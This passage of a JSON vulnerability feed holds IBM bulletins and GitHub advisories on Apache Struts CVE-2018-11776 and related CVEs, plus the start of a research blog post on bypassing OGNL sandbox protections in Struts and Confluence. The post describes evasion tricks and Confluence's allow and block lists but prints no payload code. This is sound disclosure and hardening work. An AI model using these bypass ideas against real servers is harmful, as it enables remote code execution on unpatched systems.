007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 & 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:41", "description": "## Summary\n\nApache Tomcat, Open SSL, and Apache Tomcat have multiple security vulnerabilities that could allow a remote attacker to exploit the Rational Build Forge application. Respective security vulnerabilities are discussed in detail in the subsequent sections.\n\n## Vulnerability Details\n\nThis section includes the vulnerability details that affects the Rational Build Forge.\n\n**CVEID:** [CVE-2018-8014](<https://vulners.com/cve/CVE-2018-8014>) \n**DESCRIPTION:** Apache Tomcat could provide weaker than expected security, caused by insecure default settings for the CORS filter. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/143411> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2018-8034](<https://vulners.com/cve/CVE-2018-8034>) \n**DESCRIPTION:** Apache Tomcat could allow a remote attacker to bypass security restrictions, caused by a missing host name verification when using TLS with the WebSocket client. An attacker could exploit this vulnerability to bypass security constraints to access restricted resources. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/147211> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2018-0732](<https://vulners.com/cve/CVE-2018-0732>) \n**DESCRIPTION:** OpenSSL is vulnerable to a denial of service, caused by the sending of a very large prime value to the client by a malicious server during key agreement in a TLS handshake. By spending an unreasonably long period of time generating a key for this prime, a remote attacker could exploit this vulnerability to cause the client to hang. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/144658> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n**CVEID:** [CVE-2018-0737](<https://vulners.com/cve/CVE-2018-0737>) \n**DESCRIPTION:** OpenSSL could allow a local attacker to obtain sensitive information, caused by a cache-timing side channel attack in the RSA Key generation algorithm. An attacker with access to mount cache timing attacks during the RSA key generation process could exploit this vulnerability to recover the private key and obtain sensitive information. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/141679> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n\n**CVEID:** [CVE-2018-1333](<https://vulners.com/cve/CVE-2018-1333>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service. By sending specially crafted HTTP/2 requests, a remote attacker could exploit this vulnerability to cause worker exhaustion. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/146701> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2018-8011](<https://vulners.com/cve/CVE-2018-8011>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service, caused by a NULL pointer dereference in the mod_md challenge handler. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to cause the child process to segfault. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/146700> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n## Affected Products and Versions\n\nAll the versions of IBM Rational Build Forge from 8.0 through 8.0.0.8.\n\n## Remediation/Fixes\n\nApply the correct fix pack or iFix for your version of the Rational Build Forge:\n\n**Affected Version** | **Fix** \n---|--- \nBuild Forge 8.0 - 8.0.0.8 | Rational Build Forge 8.0.0.9 [Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.9&source=SAR>). \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-21T22:55:01", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Tomcat, Open SSL, and Apache HTTPD affects Rational Build Forge", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0732", "CVE-2018-0737", "CVE-2018-1333", "CVE-2018-8011", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2018-11-21T22:55:01", "id": "9304092E63FBA16253D493D2E1E4C422EF1498D05C9ADDCBBA838C3C29B1EF87", "href": "https://www.ibm.com/support/pages/node/719629", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-01T17:30:01", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T16:32:32", "type": "github", "title": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2023-01-09T05:03:13", "id": "GHSA-R4X2-3CQ5-HQVP", "href": "https://github.com/advisories/GHSA-r4x2-3cq5-hqvp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T17:29:59", "description": "Apache Struts contains a Remote Code Execution when using results with no namespace and it's upper actions have no or wildcard namespace. The same flaw exists when using a url tag with no value, action set, and it's upper actions have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-18T19:24:38", "type": "github", "title": "Apache Struts vulnerable to remote command execution (RCE) due to improper input validation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-04T05:05:10", "id": "GHSA-CR6J-3JP9-RW65", "href": "https://github.com/advisories/GHSA-cr6j-3jp9-rw65", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-01T17:29:59", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:05:49", "type": "github", "title": "Spring Framework when used in combination with any versions of Spring Security contains an authorization bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2023-01-28T05:00:55", "id": "GHSA-CXRJ-66C5-9FMH", "href": "https://github.com/advisories/GHSA-cxrj-66c5-9fmh", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T17:06:16", "description": "## Overview[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#overview>)\n\nObject Graph Notation Language (OGNL) is a popular, Java-based, expression language used in popular frameworks and applications, such as Apache Struts and Atlassian Confluence. In the past, OGNL injections led to some serious remote code execution (RCE) vulnerabilities, such as the [Equifax breach](<https://www.synopsys.com/blogs/software-security/equifax-apache-struts-vulnerability-cve-2017-5638/>), and over the years, protection mechanisms and mitigations against OGNL injections have been developed and improved to limit the impact of these vulnerabilities.\n\nIn this blog post, I will describe how I was able to bypass certain OGNL injection protection mechanisms, including the one used by Struts and the one used by Atlassian Confluence. The purpose of this blog post is to share different approaches used when analyzing this kind of protection so they can be used to harden similar systems.\n\nNo new OGNL injections are being reported as part of this research, and unless future OGNL injections are found on the affected frameworks/applications, or known double evaluations affect an existing Struts application, this research does not constitute any immediate risk for Apache Struts or Atlassian Confluence.\n\n## Hello OGNL, my old friend[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#hello-ognl-my-old-friend>)\n\nI have a past history of bugs found in Struts framework, including [CVE-2016-3087](<https://cwiki.apache.org/confluence/display/WW/S2-033>), [CVE-2016-4436](<https://cwiki.apache.org/confluence/display/WW/S2-035>), [CVE-2017-5638](<https://cwiki.apache.org/confluence/display/WW/S2-046>), [CVE-2018-1327](<https://cwiki.apache.org/confluence/display/WW/S2-056>), [CVE-2020-17530](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and even some [double OGNL injections](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) through both Velocity and FreeMarker tags that remain unfixed to this date. Therefore, I have become familiar with the OGNL sandbox and different escapes over the years and I am still interested in any OGNL-related vulnerabilities that may appear. That was the case with Atlassian Confluence, [CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) and [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>), where the former is an instance of the unresolved double evaluation via Velocity tags mentioned in my [2020 advisory](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nMy friend, Man Yue Mo, wrote a [great article](<https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/>) describing how the OGNL mitigations have been evolving over the years and there are few other posts that also describe in detail how these mitigations have been improving.\n\nIn 2020, disabling the sandbox became harder, so I decided to change the approach completely. I introduced new ways to get RCE by circumventing the sandbox, and using the application server\u2019s Instance Manager to instantiate arbitrary objects that I could use to achieve RCE. This research was presented at our Black Hat 2020 talk, [Scribbling outside of template security](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>). We reported this issue to the Apache Struts team, and they [fixed](<https://github.com/apache/struts/commit/8d3393f09a06ff4a2b6827b6544524d1d6af3c7c>) the issue by using a block list. However, in 2021, Chris McCown published a [new bypass technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>) which leverages the OGNL\u2019s AST maps and the Apache Commons Collections BeanMap class.\n\nThat was it\u2013at that point I had enough of OGNL and stopped looking into it until two events happened in the same week:\n\n * My friend, [Mert](<https://twitter.com/mertistaken>), found what he thought was an SSTI in a bug bounty program. It turned out to be an OGNL injection, so he asked me to help him with the exploitation of the issue.\n * I read several tweets claiming that [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>) was not vulnerable to RCE on the latest Confluence version (7.18.0 at that time).\n\nOkay, OGNL, my old friend. Here we go again.\n\n## Looking at Confluence `isSafeExpression` protection[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-at-confluence-issafeexpression-protection>)\n\nWhen the CVE-2022-26134 was released there was an initial understanding that the [OGNL injection could not lead to direct RCE in the latest version 7.18.0](<https://twitter.com/httpvoid0x2f/status/1532924239216627712>) since the `isSafeExpression` method was not possible to bypass for that version\n\n![Screenshot of a tweet from user @httpvoid0x2f on June 4, 2022 that reads, \"As you might have noticed most recent version instances won't give you a code execution. This is due to isSafeExpression\$\$ protections and the fact only ${} notation is being evaluated and there's no straight forward way to confirm this due to injection being blind.\" ](https://github.blog/wp-content/uploads/2023/01/image1-5.png?w=594&resize=594%2C295)\n\nHarsh Jaiswal ([@rootxharsh](<https://twitter.com/rootxharsh>)) and Rahul Maini ([@iamnoooob](<https://twitter.com/iamnoooob>)) took a different approach and looked for a gadget chain in the allowed classes list that could allow them to create an admin account.\n\n![The picture shows a road with two ways: bypassing the isSafeExpression method or finding a gadget in the allowed list. The car chooses the latter.](https://github.blog/wp-content/uploads/2023/01/image7-1.png?w=500&resize=500%2C507)\n\nSoon after, [@MCKSysAr](<https://twitter.com/MCKSysAr>) found a [nice and simple bypass](<https://twitter.com/MCKSysAr/status/1533053536430350337>):\n\n 1. Use `Class` property instead of `class` one.\n 2. Use string concatenation to bypass string checks.\n\n \n![Payload used by MCKSysAr to bypass Confluence sandbox](https://github.blog/wp-content/uploads/2023/01/image4-2.png?w=1024&resize=1024%2C165) \n\n\nMCKSysAr\u2019s bypass was soon addressed by blocking the access to the `Class` and `ClassLoader` properties. I had some other ideas, so I decided to take a look at the `isSafeExpression` implementation.\n\nThe first interesting thing I learned was that this method was actually parsing the OGNL expression into its AST form in order to analyze what it does and decide whether it should be allowed to be executed or not. Bye-bye to regexp-based bypasses.\n\nThen the main logic to inspect the parsed tree was the following:\n\n * Starting at the root node of the AST tree, recursively call `containsUnsafeExpression()` on each node of the tree.\n * If the node is an instance of `ASTStaticField`, `ASTCtor` or `ASTAssign` then the expression is deemed to be unsafe. This will prevent payloads using the following vectors: \n * Static field accesses\n * Constructors calls\n * Variable assignments\n * If the node is an `ASTStaticMethod` check that the class the method belongs to is in an allow list containing: \n * `net.sf.hibernate.proxy.HibernateProxy`\n * `java.lang.reflect.Proxy`\n * `net.java.ao.EntityProxyAccessor`\n * `net.java.ao.RawEntity`\n * `net.sf.cglib.proxy.Factory`\n * `java.io.ObjectInputValidation`\n * `net.java.ao.Entity`\n * `com.atlassian.confluence.util.GeneralUtil`\n * `java.io.Serializable`\n * If node is an `ASTProperty` checks block list containing (after the initial fix): \n * `class`\n * `Class`\n * `classLoader`\n * `ClassLoader`\n * If the property looks like a class name, check if the class's namespace is defined in the `unsafePackageNames` block list (too long to list here).\n * If node is an `ASTMethod`, check if we are calling 